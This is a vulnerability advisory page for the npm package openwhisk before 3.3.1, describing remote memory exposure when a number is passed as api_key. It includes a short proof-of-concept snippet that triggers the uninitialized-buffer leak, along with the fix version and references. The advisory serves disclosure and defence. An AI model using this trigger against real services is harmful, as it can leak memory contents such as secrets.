Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTUzbWotbWMzOC1xODk0
Remote Memory Exposure in openwhisk
Versions of openwhisk before 3.3.1 are vulnerable to remote memory exposure.
When a number is passed to api_key, affected versions of openwhisk allocate an uninitialized buffer and send that over network in Authorization header (base64-encoded).
Proof of concept:
var openwhisk = require('openwhisk');
var options = {
apihost: '127.0.0.1:1433',
api_key: USERSUPPLIEDINPUT // number
};
var ow = openwhisk(options);
ow.actions.invoke({actionName: 'sample'}).then(result => console.log(result))
Recommendation
Update to version 3.3.1 or later.
Permalink: https://github.com/advisories/GHSA-53mj-mc38-q894JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTUzbWotbWMzOC1xODk0
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: about 3 years ago
Updated: 11 months ago
Identifiers: GHSA-53mj-mc38-q894
References:
- https://github.com/openwhisk/openwhisk-client-js/pull/34
- https://www.npmjs.com/advisories/600
- https://github.com/advisories/GHSA-53mj-mc38-q894
Affected Packages
npm:openwhisk
Versions: < 3.3.1Fixed in: 3.3.1